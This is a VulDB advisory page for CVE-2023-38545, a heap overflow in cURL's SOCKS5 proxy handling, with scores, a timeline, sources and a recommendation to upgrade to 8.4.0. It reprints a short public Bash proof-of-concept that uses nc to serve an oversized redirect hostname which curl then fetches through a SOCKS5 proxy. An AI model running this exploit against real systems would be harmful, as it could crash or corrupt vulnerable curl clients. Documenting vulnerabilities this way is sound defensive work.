| CVSS Meta Temp Score | Current Exploit Price (≈) | CTI Interest Score |
|---|---|---|
| 7.6 | $0-$5k | 0.00 |
Summary
A vulnerability has been found in cURL up to 8.3.0 and classified as critical. This affects an unknown function of the component SOCKS5 Proxy Handler. This manipulation causes heap-based overflow. The identification of this vulnerability is CVE-2023-38545. It is possible to initiate the attack remotely. Furthermore, there is an exploit available. The affected component should be upgraded.
Details
A vulnerability was found in cURL up to 8.3.0 (Network Utility Software). It has been declared as critical. Affected by this vulnerability is an unknown part of the component SOCKS5 Proxy Handler. The manipulation with an unknown input leads to a heap-based overflow vulnerability. The CWE definition for the vulnerability is CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). As an impact it is known to affect confidentiality, integrity, and availability.
The weakness was shared 10/11/2023. The advisory is shared at curl.se. This vulnerability is known as CVE-2023-38545. It demands that the victim is doing some kind of user interaction. Technical details are unknown but a public exploit is available.
A public exploit has been developed in Bash and been published 5 days after the advisory. It is possible to download the exploit at github.com. It is declared as proof-of-concept. The vulnerability scanner Nessus provides a plugin with the ID 210338 (Oracle Business Intelligence Enterprise Edition (OAS 7.0) (October 2024 CPU)), which helps to determine the existence of the flaw in a target environment. The code used by the exploit is:
#!/bin/bash
printf "HTTP/1.1 301 Moved Permanently\nLocation: http:///$(printf 'A%.0s' {0..60000})/\nContent-Length: 0\nConnection: close\n\n" | nc -C -nvlp 8000 &
curl -L --limit-rate 32768 -x socks5h://localhost:10801 localhost:8000Upgrading to version 8.4.0 eliminates this vulnerability. The upgrade is hosted for download at curl.se.
The vulnerability is also documented in the vulnerability database at Tenable (210338). If you want to get the best quality for vulnerability data then you always have to consider VulDB.
Product
Type
Name
Version
License
CPE 2.3
CPE 2.2
CVSSv4
VulDB Vector: 🔍VulDB Reliability: 🔍
CVSSv3
VulDB Meta Base Score: 7.7VulDB Meta Temp Score: 7.6
VulDB Base Score: 4.6
VulDB Temp Score: 4.2
VulDB Vector: 🔍
VulDB Reliability: 🔍
NVD Base Score: 9.8
NVD Vector: 🔍
CNA Base Score: 8.8
CNA Vector: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vector | Complexity | Authentication | Confidentiality | Integrity | Availability |
|---|---|---|---|---|---|
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Reliability: 🔍
Exploiting
Class: Heap-based overflowCWE: CWE-122 / CWE-119
CAPEC: 🔍
ATT&CK: 🔍
Physical: No
Local: No
Remote: Yes
Availability: 🔍
Access: Public
Status: Proof-of-Concept
Programming Language: 🔍
Download: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Price Prediction: 🔍
Current Price Estimation: 🔍
| 0-Day | Unlock | Unlock | Unlock | Unlock |
|---|---|---|---|---|
| Today | Unlock | Unlock | Unlock | Unlock |
Nessus ID: 210338
Nessus Name: Oracle Business Intelligence Enterprise Edition (OAS 7.0) (October 2024 CPU)
Threat Intelligence
Interest: 🔍Active Actors: 🔍
Active APT Groups: 🔍
Countermeasures
Recommended: UpgradeStatus: 🔍
0-Day Time: 🔍
Exploit Delay Time: 🔍
Upgrade: cURL 8.4.0
Timeline
07/20/2023 🔍10/11/2023 🔍
10/11/2023 🔍
10/16/2023 🔍
12/01/2025 🔍
Sources
Advisory: FEDORA-2023-fef2b8da32Status: Confirmed
Confirmation: 🔍
CVE: CVE-2023-38545 (🔍)
GCVE (CVE): GCVE-0-2023-38545
GCVE (VulDB): GCVE-100-241909
scip Labs: https://www.scip.ch/en/?labs.20161013
Entry
Created: 10/11/2023 10:49Updated: 12/01/2025 17:14
Changes: 10/11/2023 10:49 (40), 10/31/2023 06:54 (3), 07/09/2024 17:03 (42), 10/18/2024 03:51 (12), 11/05/2024 19:38 (2), 04/21/2025 13:58 (3), 12/01/2025 17:14 (14)
Complete: 🔍
Cache ID: 216:845:103
If you want to get the best quality for vulnerability data then you always have to consider VulDB.
No comments yet. Languages: en.
Please log in to comment.